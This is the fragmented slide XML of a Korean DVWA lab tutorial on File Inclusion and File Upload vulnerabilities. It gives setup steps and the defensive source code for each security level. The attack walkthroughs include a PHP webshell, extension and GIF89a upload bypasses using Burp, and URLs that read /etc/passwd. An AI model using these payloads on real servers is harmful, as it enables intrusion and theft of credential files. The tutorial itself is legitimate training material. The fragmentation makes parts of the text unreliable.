            <a:ext cx="5913238" cy="501650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주소나 절대경로를 써도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안뚫림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 위의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ftp:///etc/passwd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처럼 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ftp://[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쓰면 여전히 파일 내용을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15231" y="16281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0B66CDA6-9851-4773-B3DD-8BA175B4C4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0" r="13776" b="61576"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="415230" y="1738625"/>
            <a:ext cx="6061769" cy="216652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ED8A50F-495E-45B2-A434-2BAE9DCEF911}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="921364" y="2045436"/>
            <a:ext cx="2961087" cy="2330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9806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Impossible)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91765"/>
            <a:ext cx="5913238" cy="394113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 Inclusion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소스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IMPOSSIBLE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일 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자신이 허용하는 파일을 제외한 나머지는 모두 차단하는 화이트 리스트 정책을 쓰고 있다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C4C97A5-5076-4EC4-A1F5-95BFFF88C787}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426689" y="1798254"/>
            <a:ext cx="6004619" cy="324213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//GET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방식으로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page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매개변수를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가져온다음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file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변수에 담음 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$_GET(‘page’);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허용하는 파일들만 허용함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If($file != “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include.php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” &amp;&amp; $file != “file1.php” &amp;&amp; $file != “file2.php” &amp;&amp; $file != “file3.php” )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echo “ERROR: File not found!”;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exit;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48745427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7.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방어 개요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1879600"/>
            <a:ext cx="5913238" cy="735330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Inclusion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타입의 취약점으로 중요한 파일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(passwd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같은 유저 패스워드 관련한 파일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등이 털리거나 위험한 파일이 실행되면 위험하니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LFI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RFI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취약점을 막을 수 있어야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입력문을 적절한 검증 혹은 필터링을 생성하여 허용하는 파일 이외에 못하도록 만들면 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7765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8.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대비책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– Low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단계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91765"/>
            <a:ext cx="5913238" cy="394113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 Inclusion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소스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일 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필터링이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하나없는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코드라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page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부분에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뭘쓰든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뚫린다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925825CD-E3EE-46DD-A445-8CEFFE6F58CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1824540"/>
            <a:ext cx="6004619" cy="324213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//GET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방식으로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page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매개변수를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가져온다음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file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변수에 담음 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$_GET(‘page’); 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7198215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2" y="67259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8.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대비책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– Medium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단계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031841"/>
            <a:ext cx="5913238" cy="420106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 Inclusion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소스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일 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매개변수에 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http://, https://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../, ..\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들어가면 필터링하게 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주소를 쓰거나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../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이용한 상대경로로 접속해 로컬파일 보는 것을 다 차단 시킴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125CA44-A13B-427C-8D32-7E3FEF881D99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1747016"/>
            <a:ext cx="6004619" cy="324213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//GET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방식으로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page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매개변수를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가져온다음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file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변수에 담음 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$_GET(‘page’);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//http://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없애버리고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상대 경로로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못가도록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막음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str=replace(array(“http://”, “https://”), “”, $file); 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str_replace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(array(“../”, “..\”), $file);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6444202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2" y="67259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8.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대비책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– Medium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단계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921115"/>
            <a:ext cx="5913238" cy="331178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매개변수에 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http://, https://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../, ..\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들어가면 필터링하게 함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주소를 쓰거나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../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이용한 상대경로로 접속해 로컬파일 보는 것을 다 차단 시킴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F84015C-9E3C-4D1B-9C8D-F8138FA9C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" y="3984885"/>
            <a:ext cx="6050309" cy="16837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CF8ED47-B08D-49A2-9FDF-D938A76FD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" y="1812241"/>
            <a:ext cx="6050309" cy="185973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D0761F0-3C15-467E-ABB5-A67B746C1759}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1936997" y="2327825"/>
            <a:ext cx="2620013" cy="3289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860B87-9674-442A-8E18-0ABF6AA69494}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1971302" y="4422098"/>
            <a:ext cx="2870522" cy="289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9241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8.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대비책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– High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단계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91765"/>
            <a:ext cx="5913238" cy="394113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 Inclusion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소스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일 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주소를 써서 외부 웹페이지를 끌어올 수 있던 걸 차단시킴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파일도 이름에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붙거나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include.php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파일만 접속 가능하게 해 절대경로나 상대경로로 로컬파일을 보지 못하게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42A8FF2B-6379-47AA-ACA0-295E9ECC2F8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426689" y="1798254"/>
            <a:ext cx="6004619" cy="324213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//GET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방식으로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page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매개변수를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가져온다음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file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변수에 담음 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$_GET(‘page’);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앞에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file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이 붙거나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include.php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면 통과함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if(!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fnmatch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(“file*”, $file) &amp;&amp; $file != “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include.php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”){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echo “ERROR: File not found!”;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exit;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3463128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유저 생성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실습을 진행하기 위해 아까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config.inc.php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파일에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설정해두었던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유저를 생성해줍니다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/*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부분을 안해주거나 비밀번호가 틀렸거나 하면 로그인 창이 뜨지 않습니다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*/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유저를 새로 생성했다면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적용시켜주기위해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mysql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apache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데몬을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재시작합니다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DVWA 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설치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console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mysql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–u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root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–p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Enter password: ****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mysql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CREATE user ‘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’ IDENTIFIED BY ‘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’;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mysql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GRANT ALL PRIVILEGES ON *.* TO ‘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’@’%’;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mysql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FLUSH PRIVILEGES;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mysql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exit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restart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mysql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apache2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96499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8.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대비책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– High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단계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310859"/>
            <a:ext cx="5913238" cy="292204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절대경로로 뚫을 수 있던 걸 막음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ftp://[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로컬파일주소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쓰면 뚫리는 걸 볼 수 있음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AEEBE7F6-041E-42B8-B367-09CB27FD4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" y="1879601"/>
            <a:ext cx="5958927" cy="1198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0B4CAB-F407-499F-B069-9F90CDD3F7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0" r="13776" b="61576"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="415232" y="3129189"/>
            <a:ext cx="5913238" cy="27752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80833C-F9B3-45DA-B65A-9B6C89A75DCB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2857715" y="2212324"/>
            <a:ext cx="3516443" cy="2666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8332D4E-B23B-426F-BDC5-10F316C47537}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="756473" y="3497925"/>
            <a:ext cx="3021048" cy="2872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7558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8.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대비책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– Impossible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단계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91765"/>
            <a:ext cx="5913238" cy="3941135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 Inclusion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소스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보안이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IMPOSSIBLE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 일 때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자신이 허용하는 파일을 제외한 나머지는 모두 차단하는 화이트 리스트 정책을 쓰고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코드를 쓰면 공격절차에서 쓰인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RFI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LFI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방법들은 못쓴다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*get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방식이 아닌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방식으로 보내면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부분에 매개변수가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안나온다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C4C97A5-5076-4EC4-A1F5-95BFFF88C787}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426689" y="1798254"/>
            <a:ext cx="6004619" cy="324213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//GET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방식으로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page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매개변수를 </a:t>
            </a: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가져온다음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file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변수에 담음 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$file = $_GET(‘page’);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허용하는 파일들만 허용함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If($file != “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include.php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” &amp;&amp; $file != “file1.php” &amp;&amp; $file != “file2.php” &amp;&amp; $file != “file3.php” )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echo “ERROR: File not found!”;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exit;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53727700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8.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대비책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– Impossible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단계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3315303"/>
            <a:ext cx="5913238" cy="591759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RFI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막히는 것을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B1F85D7-2638-455F-905D-EA741C9F73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33" b="5973"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1981944"/>
            <a:ext cx="6004619" cy="82535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19105A7-BD16-48D9-A3A8-7E0B5001384A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1700853" y="2212324"/>
            <a:ext cx="3470754" cy="17111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57450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8.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대비책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– Impossible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단계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3642611"/>
            <a:ext cx="5913238" cy="5590290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ftp:///etc/passwd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막히는 것을 확인 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3-4) File Inclusion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364ED46-DA0D-4D21-A396-3DEC8F38D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0" y="1851109"/>
            <a:ext cx="5958930" cy="90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1848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6C5898-8357-4C26-8A5A-064F4672E94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94FB019-8F79-4C25-89D9-4E6888C5E8CB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E22650C1-1F7F-4CA1-9AE7-F3739B437E13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813" y="3048507"/>
            <a:ext cx="4485405" cy="1352903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File Upload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46AB0-0C28-4D7C-8C3B-D67E479EA7AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="122473" y="3309457"/>
            <a:ext cx="2193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3-5</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="6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1485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개요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업로드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(File Upload)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취약점은 서버 스크립트 코드가 포함된 파일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Webshell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올려 코드를 실행하는 방식이다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웹쉘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업로드 취약점은 다음과 같은 확장자를 가지는 파일을 업로드 할 수 있을 경우에 발생한다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ASP/ASPX : asp,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aspx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asa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cer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inc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cdx</a:t>
            </a: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JSP :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jsp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jspx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PHP5 : php, php3, php4,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phtml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PHP7 : php, php3, php4, php5,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pht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phtml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업로드 취약점은 비정상적인 파일을 서버에서 동작하도록 만드는 점에서 내부 파일 실행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(LFI, Local File Inclusion)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취약점과 비슷하다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2475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먼저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Level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실습하기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Security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들어가 보안 레벨을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낮춘 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F84E0C0-20A6-44FE-A351-8FC273C39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48" y="2240280"/>
            <a:ext cx="5758986" cy="39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24232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파일을 업로드 할 수 있는지 확인하기 위해 이미지 파일을 업로드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B5470C1-A937-42D9-88CE-9688A48EE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25" y="3051686"/>
            <a:ext cx="6199632" cy="317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935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 이미지 파일을 업로드 할 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../../hackable/uploads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경로에 파일이 성공적으로 저장되었다는 메시지가 출력된다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9D0C4D2A-E060-4BF3-8DFD-43E26473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2" y="3579038"/>
            <a:ext cx="6222993" cy="20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8527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Source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페이지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Source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보니 업로드가 불가능한 파일 확장자나 다른 보안요소를 확인할 수 없었다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6144F897-C33C-4AE1-83AD-6F64B2612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91" y="3533655"/>
            <a:ext cx="6021418" cy="218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80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30AF010E-1DA2-4777-9415-244A2BB412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789" r="9789"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="473075" y="1968500"/>
            <a:ext cx="5911850" cy="4686300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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localhost/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접속해보면 위의 화면이 뜨게 됩니다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초록색 글자가 아닌 빨간색 글자가 뜬다면 하나하나 수정해주면 됩니다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/* PHP module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gd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빨간색 이라면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*/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 apt-get install –y php-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DVWA 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설치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5553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파일이 정상적으로 업로드 되는 것을 확인했으니 이번에는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파일을 업로드 하기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php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스크립트를 작성한다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BD2152D-4DC9-46B9-A61A-E59B86374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6" y="3494753"/>
            <a:ext cx="6106586" cy="243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8499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웹에서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입력할 수 있게 해주는 스크립트를 작성한다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구문은 다음과 같다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&lt;?php system($_GET[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]); ?&gt;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957DA88-41DF-425C-9F06-7EB147E4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59" y="4002633"/>
            <a:ext cx="5754079" cy="117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2136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이번에는 작성한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파일을 업로드한다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1241BFD-4165-4824-857B-F7DEDFD1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3" y="3374838"/>
            <a:ext cx="5742432" cy="22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0582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업로드한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파일의 위치를 주소창에 입력해 파일을 실행시킨다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F6B29F2-40D9-4182-A58D-C6700200C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" y="3503759"/>
            <a:ext cx="5614416" cy="217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73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파일의 경로 뒤에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=[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입력하여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파일이 잘 동작하는지 확인한다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4527DD4-35CD-4831-8834-390656179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80" y="4247604"/>
            <a:ext cx="6004620" cy="6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2551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=cat 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etc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/passwd </a:t>
            </a:r>
          </a:p>
          <a:p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입력해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etc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/passwd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파일을 확인한다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잘 동작하여 출력되는 것을 확인할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0CA6535-ED51-4DDE-864A-5A2FB8BE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45" y="2421767"/>
            <a:ext cx="5650992" cy="41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603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레벨을 실습하기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선택하고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D3C7AF8E-13B7-4333-87CC-0C4847EE60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8" y="2656823"/>
            <a:ext cx="5782482" cy="36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247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level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업로드했던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업로드 하려고 하니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JEPG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파일이나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PNG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파일만 업로드 할 수 있다는 메시지가 출력되며 업로드 되지 않는 것을 확인할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8EEAC49-1CB3-4A65-8BB4-DB9CFFED2C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81" y="3216003"/>
            <a:ext cx="5913238" cy="266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9960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Source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페이지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Source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확인해보니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확장자에 대한 보안이 존재한다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이미지 타입이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jpeg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이거나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png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이여야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하고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파일의 크기에 대한 제한이 생겼다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96E112B-7A89-4976-92F4-FFB692F50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36" y="2735547"/>
            <a:ext cx="6072927" cy="357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202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 파일 형식으로 업로드 하기 위해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업로드에 실패했던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파일의 확장자를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cmd.php.jpg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바꾸어준다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F4C82D8-8E97-46EA-82A5-0F129A736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43" y="3957318"/>
            <a:ext cx="6104596" cy="132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42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localhost/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접속한 후 모두 정상적으로 초록 글씨가 보인다면  아래쪽에 있는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[Create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Reset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Database]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정상적으로 설정을 완료했다면 로그인 화면이 보이게 됩니다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/* localhost/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login.php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*/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테스트용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admin / password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계정으로 로그인합니다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DVWA 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설치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개체 틀 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53BB2EDF-FF23-4179-A5C9-1E4E087FE1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9789" r="9789"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="473075" y="1968500"/>
            <a:ext cx="59118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737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5"/>
            <a:ext cx="5913238" cy="25302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칼리에서 제공하는 버프 스위트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Burpsuite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이용해 프록시를 이용하여 중간 과정에서 확장자명을 다시 바꿔줄 것이다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버프 스위트를 통해 파이어폭스에서 웹 서버를 사용할 때 버프 스위트가 프록시의 역할을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해당 공격에서의 시나리오는 다음과 같다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cmd.php.Jpg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파일을 올리는 것처럼 접근한 뒤 중간에서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프록싱을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하는 버프 스위트가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cmd.php.Jpg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파일을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파일로 바꾸어 업로드한다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과정을 위해 먼저 버프 스위트를 실행한다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060317DA-705C-4F58-A936-7FD73F02A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76" y="1989672"/>
            <a:ext cx="5413248" cy="47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1282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버프 스위트를 실행한 후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브라우저로 들어와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Preferences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들어간다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F394A23-AE33-4C84-8574-2A1001A03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9" y="2656823"/>
            <a:ext cx="5702163" cy="371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37837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후 아래로 내려가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Network Settings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Setting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들어간다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75AD9A24-F301-47AF-8F96-C99B7A420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" y="2520338"/>
            <a:ext cx="5811598" cy="39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108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Manual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proxt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configuration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선택하고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HTTP Proxy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127.0.0.1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넣어주고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포트 번호에는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8080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기입한다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아래 항목에 체크를 한 후 저장하고 나온다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28CD7CA-26C4-4A3D-A5C6-E6D84BB35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0" y="2263013"/>
            <a:ext cx="5702261" cy="462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422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세팅이 끝났으니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DVWA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아까 만들어 두었던 파일을 업로드할 차례이다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[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IP]/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접속한다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838BF70-3454-46A6-A208-C7C64C21A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61" y="2656823"/>
            <a:ext cx="5360276" cy="373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641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버프 스위트가 프록시의 역할을 하고 있기 때문에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바로 다음 페이지로 넘어가지 않고 버프 스위트가 실행되는 모습을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Forward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눌러 해당 데이터를 넘길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 파일 업로드를 시도할 경우 버프 스위트에서 지나가는 데이터를 확인하고 변경할 수 있는데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여기에서 중간에 보이는 파일확장자를 변경해준다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cmd.php.jpg -&gt;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85AFB425-3665-45F2-A727-F5E6419F0F34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286000" y="4758133"/>
            <a:ext cx="742950" cy="1313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16014D7-7FCA-408F-9FA9-8F102474E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1" y="2364584"/>
            <a:ext cx="6000659" cy="419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6493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버프 스위트를 통해 파일 확장자를 변경한 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Forward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눌러 데이터를 서버로 전달해주면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업로드가 완료되었다는 메시지가 출력된다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3109BF9-D2B6-43A6-8CDD-CBE22F92D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36" y="2552699"/>
            <a:ext cx="5718527" cy="40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6237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업로드가 잘 완료되었는지 확인하기 위해 주소창에 파일의 위치를 입력하고 마지막 구문에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=cat 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etc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/passwd</a:t>
            </a:r>
          </a:p>
          <a:p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입력해주면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passwd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파일이 잘 보이는 것을 확인할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1E21F21-3378-4CD7-B5EE-19BD7AD026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7" y="2584422"/>
            <a:ext cx="5961927" cy="415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5878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Level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에서는 실제 이미지 파일이 갖는 값을 가지고 있어야 업로드 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기존의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파일을 조금 변경해야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먼저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파일의 구문 앞에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GIF89a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값을 추가해준다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그리고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cmd.php.jpg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변경해야한다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후 파일을 업로드하면 정상적으로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업로드되는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것을 확인할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433C55F7-4E03-467C-9536-837ED02DB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3" y="3279166"/>
            <a:ext cx="5884150" cy="272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7089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버프 스위트를 통해 확인해보면 다음과 같이 보여진다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 확장자는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jpg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아래에는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GIF89a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추가한 구문이 보인다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C9C737EC-AE42-43CF-A4BD-4C9D2EEEB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3" y="2429098"/>
            <a:ext cx="5805714" cy="412657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B8A746E-F936-4BF6-BB93-083B68F8E78D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="6311568"/>
            <a:ext cx="1508820" cy="294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EA1FB8-6012-451B-A201-F347D0E1D288}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2758380" y="5930842"/>
            <a:ext cx="1508820" cy="2949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265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XAMPP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다운로드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EA396729-AEDE-403B-8E93-7034DA7222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5" t="-2455" r="449" b="-8550"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="443579" y="1968500"/>
            <a:ext cx="5911850" cy="4686300"/>
          </a:xfrm>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg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268068"/>
            <a:ext cx="5913238" cy="296483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www.apachefriends.org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로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들어가서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XAMPP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다운받아준다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소유하고 있는 칼리 리눅스의 버전에 알맞은 버전을 다운받아야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실습에서는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5.6.23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버전을 사용하였다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설치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707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파일이 업로드 되었으니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주소창에 다음 경로와 명령어를 입력하여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passwd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파일이 보이는 것을 확인할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다음과 같다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http://192.168.0.74/dvwa/vulnerabilities/fi/?page=file:///opt/lampp/htdocs/dvwa/hackable/uploads/test.php.jpg&amp;cmd=cat%20/etc/passwd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2C15EE-218D-430C-99AE-5C925D5C9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6" y="3964606"/>
            <a:ext cx="5969525" cy="16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2948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Impossible)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968497"/>
            <a:ext cx="2914650" cy="7509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&lt;?php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone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if(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isset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$_POST[ 'Upload' ] ) ) {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// Check Anti-CSRF token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checkToken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$_REQUEST[ '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user_token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 ], $_SESSION[ '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session_token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 ], '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index.php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 );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone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// File information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uploaded_name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$_FILES[ 'uploaded' ][ 'name' ];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uploaded_ext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=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substr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uploaded_name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strrpos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uploaded_name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'.' ) + 1);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uploaded_size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$_FILES[ 'uploaded' ][ 'size' ];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uploaded_type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$_FILES[ 'uploaded' ][ 'type' ];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uploaded_tmp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= $_FILES[ 'uploaded' ][ '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tmp_name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 ];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone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// Where are we going to be writing to?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target_path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= DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads/';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//$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target_file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=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basename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uploaded_name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'.' .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uploaded_ext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 . '-';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target_file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=  md5(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uniqid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.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uploaded_name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 . '.' .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uploaded_ext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temp_file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= ( (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ini_get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'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upload_tmp_dir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 ) == '' ) ? (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sys_get_temp_dir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) : (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ini_get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'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upload_tmp_dir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 ) ) );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temp_file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.= DIRECTORY_SEPARATOR . md5(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uniqid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.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uploaded_name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 . '.' .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uploaded_ext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B14E246-3735-4402-8A45-4F2559D8C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968498"/>
            <a:ext cx="2914650" cy="695378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Impossible Level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에서는 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Midium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Level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비교해 강력한 보안을 가진다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크게 두 가지의 보안이 추가되었는데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imagedestroy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/ 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imagecreatefromjpeg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함수와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rename()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이용했다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227165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Impossible)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968497"/>
            <a:ext cx="2914650" cy="75093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// Is it an image?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if( (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strtolower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uploaded_ext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 == 'jpg' ||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strtolower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uploaded_ext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 == 'jpeg' ||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strtolower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uploaded_ext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 == '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png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 ) &amp;&amp;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uploaded_size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&lt; 100000 ) &amp;&amp;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uploaded_type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== 'image/jpeg' ||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uploaded_type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== 'image/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png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' ) &amp;&amp;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getimagesize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uploaded_tmp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 ) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone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// Strip any metadata, by re-encoding image (Note, using php-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Imagick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is recommended over php-GD)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if(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uploaded_type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== 'image/jpeg' ) {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imagecreatefromjpeg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uploaded_tmp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imagejpeg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temp_file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100);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}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else {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imagecreatefrompng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uploaded_tmp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imagepng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temp_file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9);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}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imagedestroy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);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B14E246-3735-4402-8A45-4F2559D8C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968498"/>
            <a:ext cx="2914650" cy="695378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imagecreatefromjpeg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함수는 주어진 이미지 파일로부터 새로운 이미지를 생성하는 함수이다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imagedestroy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함수는 생성된 이미지 객체를 메모리에서 해제하는 함수이다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업로드 될 객체를  이미지파일로 재생성한 후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기존의 업로드 파일을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destroy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방식으로 보안이 구성된다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marL="0" indent="0">
              <a:buNone/>
            </a:pP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98630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Impossible)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968497"/>
            <a:ext cx="2914650" cy="75093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// Can we move the file to the web root from the temp folder?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if( rename(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temp_file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(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getcwd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. DIRECTORY_SEPARATOR .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target_path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.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target_file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 ) ) {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// Yes!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echo "&lt;pre&gt;&lt;a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href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='${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target_path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}${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target_file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}'&gt;${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target_file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}&lt;/a&gt;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succesfully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uploaded!&lt;/pre&gt;";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}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else {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// No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echo '&lt;pre&gt;Your image was not uploaded.&lt;/pre&gt;';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}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone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// Delete any temp files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if( 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file_exists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temp_file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 )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unlink( $</a:t>
            </a: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temp_file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);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}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else {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// Invalid file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echo '&lt;pre&gt;Your image was not uploaded. We can only accept JPEG or PNG images.&lt;/pre&gt;';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}</a:t>
            </a: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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone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Generate Anti-CSRF token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1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generateSessionToken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();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone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?&gt; </a:t>
            </a:r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B14E246-3735-4402-8A45-4F2559D8C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968498"/>
            <a:ext cx="2914650" cy="6953782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Rename()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함수는 업로드 될 파일의 이름을 재지정 하는 함수이다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기존의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웹쉘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공격은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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경로와 파일의 이름을 입력하는 방식으로 접근했기 때문에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이름을 변경함으로써 기존의 방식으로 접근이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불가능해진다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25745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방어 대책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968497"/>
            <a:ext cx="2914650" cy="750932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File Upload Source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vulnerabilities/upload/source/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low.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="12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&lt;?php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="12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if( 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isset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>( $_POST[ 'Upload' ] ) ) {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// Where are we going to be writing to?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1200" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";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1200" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> .= 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basename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>( $_FILES[ 'uploaded' ][ 'name' ] );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="12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// Can we move the file to the upload folder?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if( !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move_uploaded_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>( $_FILES[ 'uploaded' ][ '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tmp_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>' ], $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1200" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> ) ) {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    // No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    echo '&lt;pre&gt;Your image was not uploaded.&lt;/pre&gt;';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}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else {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    // Yes!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    echo "&lt;pre&gt;{$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1200" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>} 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succesfully</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> uploaded!&lt;/pre&gt;";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    }</a:t>
            </a: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}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="12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?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US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B14E246-3735-4402-8A45-4F2559D8C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968498"/>
            <a:ext cx="2914650" cy="6953782"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="270000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Low Level </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>공격의 해답은 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cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"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ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>를 실행하는 스크립트로 짜여진 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>cmd.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"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ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>파일을 업로드해 실행하는 방법이었다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
